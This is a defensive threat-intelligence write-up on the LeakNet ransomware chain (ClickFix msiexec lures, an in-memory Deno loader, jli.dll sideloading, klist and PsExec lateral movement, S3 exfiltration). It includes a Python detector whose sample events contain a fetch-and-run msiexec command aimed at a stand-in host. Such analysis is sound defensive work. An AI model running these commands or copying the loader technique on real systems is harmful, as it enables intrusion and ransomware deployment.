LeakNet Ransomware Dissection

LeakNet is an emerging ransomware operator that entered the threat landscape in late 2024. Averaging about three victims per month, the group is now scaling up and shifting tactics — and two developments stand out: a social engineering technique called ClickFix delivered through compromised legitimate websites, and a previously unreported Deno-based in-memory loader that executes payloads almost entirely in memory. This is not an incremental upgrade. It is a deliberate re-architecture of the group’s attack pipeline from procurement-dependent to self-sustaining.

Stage 1 — Initial Access: ClickFix via Compromised Websites

LeakNet’s entry method has shifted from buying stolen credentials through IABs to running its own delivery campaigns. LeakNet leverages compromised legitimate websites to host ClickFix lures — fake error messages and verification pages, including spoofed Cloudflare Turnstile prompts — that trick users into executing msiexec commands.

The operational advantage here is substantial. By generating their own entry points, the attackers bypass the need to wait for valuable accounts to appear on dark web markets, greatly reducing their cost per victim and allowing them to cast a wide net targeting anyone browsing the web.

The ClickFix pages prompted users to run a Windows Installer command through msiexec — that command downloaded and ran a loader associated with LeakNet. The delivery appeared opportunistic rather than targeted: any employee who encounters the lure could become an entry point.

A second confirmed delivery vector adds further scope. ReliaQuest also observed an intrusion attempt in which threat actors used Microsoft Teams-based phishing to socially engineer a user into launching a payload chain that ended in a similar Deno-based loader — signalling either a broadening of LeakNet’s initial access vectors, or that other threat actors have adopted the technique.

Stage 2 — Execution: The Deno BYOR Loader

This is the most technically significant component of LeakNet’s updated arsenal. Rather than deploying a custom malicious binary that might trigger security tools, the attackers install the real, trusted Deno executable on the victim’s machine and use it to run malicious code. In observed activity, that process was initiated through Visual Basic Script (VBS) and PowerShell scripts, cleverly named Romeo.ps1 and Juliet.vbs.

The key evasion mechanism is memory-only execution. Rather than writing a JavaScript file to disk where it could be scanned, LeakNet feeds the payload to Deno as a base64-encoded data URL, which Deno decodes and runs entirely in memory.

The payload is designed to fingerprint the compromised system, contact an external server to fetch next-stage malware, and enter into a polling loop that repeatedly fetches and executes additional code through Deno.

From a detection standpoint, because Deno is a trusted tool, standard security blocklists often ignore its activity — leaving almost no evidence on the hard drive and making it extremely difficult for traditional antivirus software to detect.

Stage 3 — Post-Exploitation: The Repeatable Kill Chain

Despite evolving entry methods, the post-compromise chain is identical across every confirmed incident — and this consistency is simultaneously LeakNet’s operational strength and its defenders’ only reliable intercept window.

DLL Sideloading

A malicious jli.dll is placed in C:\ProgramData\USOShared — a directory associated with Windows Update activity — alongside a legitimate Java binary. The technique can appear routine at first glance because it uses familiar processes and locations.

C2 Beaconing

Beaconing occurred to multiple domains across incidents while maintaining a consistent URL structure — a behavioral fingerprint that creates a reliable detection opportunity even when specific domain indicators rotate.

Credential Enumeration

The group ran cmd.exe /c klist to list active authentication credentials on the compromised system before moving to other hosts — a low-noise pre-lateral-movement step that is often overlooked in standard monitoring baselines.

Lateral Movement

After enumerating Kerberos tickets, the group uses PsExec to move laterally across the environment. PsExec usage from non-standard accounts in a non-admin context is the most detectable point in this entire chain.

Exfiltration and Staging

Malicious traffic is masked using S3 buckets and trusted cloud services, blending into expected enterprise traffic. Because S3 egress from enterprise endpoints is common in cloud-first environments, this is an intentionally low-signal exfiltration path.

Detection Opportunities

Shift detection focus away from the delivery layer and toward the behavioral signals that follow. Visibility into anomalies such as Deno running outside development environments, jli.dll sideloading in unexpected locations, and unusual PsExec usage is likely to offer the most reliable coverage against the techniques described.

Key behavioral signals to prioritize:

  • Deno.exe executing outside developer user contexts or spawning from non-IDE parents
  • msiexec commands spawned from browser processes or Win+R
  • java.exe loading jli.dll from C:\ProgramData\USOShared
  • cmd.exe /c klist followed within minutes by PsExec
  • Outbound connections to newly registered domains or unexpected S3 buckets
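As an added example, not code from the original post or from any vendor tooling, the following Python correlates the signals listed above over a few constructed process events; the IDE and browser parent lists, the event schema, and the ten-minute klist-to-PsExec window are assumptions to tune for your own telemetry.

```python
from datetime import datetime

# Parent images that explain benign Deno use (assumed list; tune to your estate).
IDE_PARENTS = {"code.exe", "devenv.exe", "idea64.exe", "webstorm64.exe"}
# Browser parents plus explorer.exe, which is the parent of anything launched from Win+R.
LURE_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "explorer.exe"}
SIDELOAD_DIR = "c:\\programdata\\usoshared\\"

# Constructed sample process telemetry (not from the original post):
# (timestamp, host, parent image, image, command line, loaded DLL path or None)
EVENTS = [
    ("2025-01-10T09:00:05", "WS01", "chrome.exe", "msiexec.exe",
     "msiexec /i https://lure.invalid/verify.msi /qn", None),
    ("2025-01-10T09:01:12", "WS01", "wscript.exe", "deno.exe",
     "deno.exe run -A data:text/javascript;base64,Ly8gcGxhY2Vob2xkZXI=", None),
    ("2025-01-10T09:03:30", "WS01", "explorer.exe", "java.exe",
     "java.exe", "C:\\ProgramData\\USOShared\\jli.dll"),
    ("2025-01-10T09:10:00", "WS01", "explorer.exe", "cmd.exe", "cmd.exe /c klist", None),
    ("2025-01-10T09:14:00", "WS01", "cmd.exe", "PsExec.exe", "PsExec.exe \\\\FS01 cmd", None),
    ("2025-01-10T10:00:00", "DEV02", "code.exe", "deno.exe", "deno.exe run main.ts", None),
]


def detect(events, window_minutes=10):
    """Return one alert string per behavioral signal found in the event list."""
    alerts = []
    last_klist = {}  # host -> time of the most recent klist, for the klist -> PsExec sequence
    for ts, host, parent, image, cmdline, dll in sorted(events, key=lambda e: e[0]):
        t = datetime.fromisoformat(ts)
        img, par, cmd = image.lower(), parent.lower(), cmdline.lower()
        if img == "deno.exe" and par not in IDE_PARENTS:
            how = "with an in-memory data: URL payload" if "data:" in cmd else "with a script"
            alerts.append(f"{host}: deno.exe spawned by {parent} outside an IDE {how}")
        if img == "msiexec.exe" and par in LURE_PARENTS:
            alerts.append(f"{host}: msiexec launched from {parent} (ClickFix pattern)")
        if img == "java.exe" and dll and dll.lower().startswith(SIDELOAD_DIR) \
                and dll.lower().endswith("\\jli.dll"):
            alerts.append(f"{host}: java.exe loaded jli.dll from USOShared (sideload)")
        if "klist" in cmd:
            last_klist[host] = t
        elif img == "psexec.exe" and host in last_klist \
                and (t - last_klist[host]).total_seconds() <= window_minutes * 60:
            alerts.append(f"{host}: PsExec within {window_minutes} min of klist (lateral movement)")
    return alerts


if __name__ == "__main__":
    for line in detect(EVENTS):
        print(line)
```

The S3 and newly-registered-domain signal is left out because it needs DNS or proxy data rather than process events.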

MITRE ATT&CK Mapping

| Tactic | Technique ID | Technique Name | Observable / Evidence |
|---|---|---|---|
| Initial Access | T1566 / T1189 | Phishing / Drive-by Compromise | ClickFix via compromised website; Teams-based phishing |
| Execution | T1059.005 / T1059.001 | Visual Basic Script / PowerShell | Juliet*.vbs and Romeo*.ps1 initiating Deno loader |
| Defense Evasion | T1574.001 / T1620 | DLL Sideloading / Reflective Code Loading | jli.dll sideloaded via Java in USOShared; fileless Deno in-memory execution |
| Discovery | T1558 | Steal or Forge Kerberos Tickets | cmd.exe /c klist enumerating active Kerberos credentials |
| Lateral Movement | T1570 | Lateral Tool Transfer via PsExec | PsExec used post Kerberos enumeration to move laterally |
| Exfiltration | T1567.002 | Exfiltration to Cloud Storage | Data staged and exfiltrated via AWS S3 buckets |
| Command & Control | T1071 | Application Layer Protocol | Consistent URL-pattern beaconing to newly registered C2 domains |

Hardening Recommendations

Organizations should block newly registered domains, since LeakNet’s command-and-control servers are typically only weeks old. Regular users should be restricted from running Win+R commands on their workstations, and PsExec should be limited to authorized administrators through Group Policy Objects. Security teams should watch for jli.dll sideloading in the C:\ProgramData\USOShared directory, unusual PsExec activity, and unexpected outbound connections to S3 buckets. Isolating a compromised host the moment post-exploitation behavior is confirmed is the most direct way to break the chain before ransomware reaches deployment.

What This Really Means

LeakNet’s design philosophy reveals three things about the current ransomware economy. First, IAB dependency is becoming a strategic liability — groups that control their own delivery are harder to disrupt. Second, the BYOR technique is not a one-group innovation; fileless execution techniques that effectively evade traditional controls tend to spread, and the Deno loader is likely to draw attention from other threat actors as its effectiveness becomes more visible. Third, the repeatable post-exploitation chain is the group’s only structural weakness — and the only place where defenders currently have a reliable window to intercept this campaign.

Organizations still relying on signature-based endpoint detection and domain blocklists will not catch LeakNet until encryption has already begun. The detection window exists exclusively in the behavioral layer.
